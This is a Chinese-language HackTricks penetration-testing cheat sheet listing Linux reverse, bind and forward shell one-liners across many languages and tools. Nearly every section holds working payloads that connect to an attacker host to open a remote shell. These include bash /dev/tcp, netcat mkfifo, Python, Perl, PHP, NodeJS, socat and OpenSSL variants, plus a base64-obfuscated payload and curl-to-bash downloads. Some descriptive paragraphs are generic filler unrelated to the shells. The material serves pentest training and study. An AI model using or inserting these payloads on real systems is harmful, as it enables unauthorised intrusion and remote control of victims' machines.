Chinese - Ht
HackTricks Training Twitter Linkedin Sponsor

Shells - Linux

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

Try Hard Security Group

如果您对这些shell有任何疑问,可以使用 https://explainshell.com/ 进行检查

Full TTY

一旦获得反向shell 阅读此页面以获取完整的TTY

Bash | sh

curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0

符号安全的shell

#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

Shell解释

  1. bash -i: 此部分命令启动一个交互式 (-i) Bash shell。

  2. >&: 此部分命令是将标准输出 (stdout) 和标准错误 (stderr) 重定向到同一目的地的简写表示。

  3. /dev/tcp/<ATTACKER-IP>/<PORT>: 这是一个特殊文件,表示与指定IP地址和端口的TCP连接

  • 通过将输出和错误流重定向到此文件,该命令有效地将交互式shell会话的输出发送到攻击者的机器。

  1. 0>&1: 此部分命令将标准输入 (stdin) 重定向到与标准输出 (stdout) 相同的目的地

创建文件并执行

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh

正向 Shell

在处理基于 Linux 的 Web 应用中的 远程代码执行 (RCE) 漏洞时,通过网络防御措施如 iptables 规则或复杂的数据包过滤机制可能会阻碍实现反向 shell。在这种受限制的环境中,一种替代方法是建立一个 PTY(伪终端)shell,以更有效地与受损系统进行交互。

一个推荐的工具是 toboggan,它简化了与目标环境的交互。

要有效地利用 toboggan,创建一个针对目标系统 RCE 上下文的 Python 模块。例如,一个名为 nix.py 的模块可以按以下结构组织:

import jwt
import httpx

def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)

response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)

# Check if the request was successful
response.raise_for_status()

return response.text

然后,您可以运行:

toboggan -m nix.py -i

直接利用交互式shell。您可以添加-b以进行Burpsuite集成,并删除-i以获得更基本的rce包装。

另一种可能性是使用IppSec的前向shell实现https://github.com/IppSec/forward-shell

您只需要修改:

  • 受攻击主机的URL

  • 您的有效负载的前缀和后缀(如果有的话)

  • 发送有效负载的方式(头部?数据?额外信息?)

然后,您可以发送命令,甚至使用upgrade命令来获得完整的PTY(请注意,管道的读取和写入会有大约1.3秒的延迟)。

Netcat

nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

gsocket

https://www.gsocket.io/deploy/中查看

bash -c "$(curl -fsSL gsocket.io/x)"

Telnet

Telnet是一种用于远程登录的网络协议。

telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Whois

攻击者

while true; do nc -l <port>; done

将命令写下来,按回车,然后按CTRL+D(停止STDIN)

受害者

export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done

Python

Python

#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Perl

Perl是一种通用的脚本语言,被广泛用于系统管理、文本处理、网络编程等领域。Perl脚本可以在Linux系统上运行,并且通常被用于编写各种类型的脚本和工具。Perl具有强大的正则表达式功能,使其成为处理文本数据的理想选择。

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

Ruby Shell

Ruby shell is a simple shell written in Ruby that allows for easy command execution. It is useful for executing commands on a target machine once a Ruby interpreter is available.

To use the Ruby shell, you can start by running the following command:

ruby ruby_shell.rb

Once the Ruby shell is running, you can execute commands on the target machine by typing them in the shell prompt.

Ruby One-Liners

Ruby one-liners are short and concise Ruby scripts that can be used for various purposes, including data manipulation, text processing, and system administration tasks. They are especially useful for quick tasks that can be accomplished with a single line of code.

Here are some examples of Ruby one-liners:

  • Print the current date and time:

ruby -e 'puts Time.now'

  • List all files in the current directory:

ruby -e 'puts Dir.glob("*")'

  • Base64 encode a string:

ruby -r base64 -e 'puts Base64.encode64("hello")'

Ruby one-liners can be a powerful tool in a hacker's arsenal for quick and efficient tasks.

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP

PHP是一种流行的服务器端脚本语言,通常用于Web开发。

// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

Java

Java是一种通用编程语言,具有跨平台特性,适用于各种应用程序开发。 Java程序可以在不同操作系统上运行,只需安装适当的Java运行时环境(JRE)。 Java程序通常编译为字节码,然后在Java虚拟机(JVM)上运行。 Java在网络应用程序和移动应用程序开发中广泛使用。

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ncat

Ncat是一个功能强大的网络工具,可以用于连接、读取和写入数据,以及进行端口扫描和监听。

victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl

Golang

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Lua

Lua是一种轻量级、高效的脚本语言,常用于嵌入式系统和游戏开发。 Lua脚本可以通过解释器执行,也可以编译成字节码运行。 Lua具有简洁的语法和强大的扩展能力,被广泛应用于各种领域。 Lua脚本可以通过C语言扩展,实现与底层系统的交互。 Lua的灵活性和易用性使其成为许多开发者的首选。

#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

NodeJS

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()


or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

OpenSSL

攻击者(Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

受害者

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Socat

https://github.com/andrew-d/static-binaries

绑定 shell

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

反向 shell

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Awk

Awk是一种强大的文本分析工具,可用于在Linux系统上处理文本数据。Awk提供了灵活的功能,可以轻松提取和处理文本文件中的特定信息。Awk通常与管道一起使用,使其成为自动化任务和数据处理的有用工具。

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Finger

攻击者

while true; do nc -l 79; done

将命令写下来,按回车,然后按CTRL+D(停止STDIN)

受害者

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done

Gawk

Gawk

#!/usr/bin/gawk -f

BEGIN {
Port    =       8080
Prompt  =       "bkd> "

Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}

Xterm

这将尝试连接到您系统的6001端口:

xterm -display 10.0.0.1:1

要捕获反向 shell,您可以使用以下命令(将在 6001 端口监听):

# Authorize host
xhost +targetip
# Listen
Xnest :1

Groovy

frohoff注意:Java反向shell也适用于Groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

参考资料

Try Hard Security Group

从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式:

上一页Shells - Windows下一页Full TTYs

最后更新于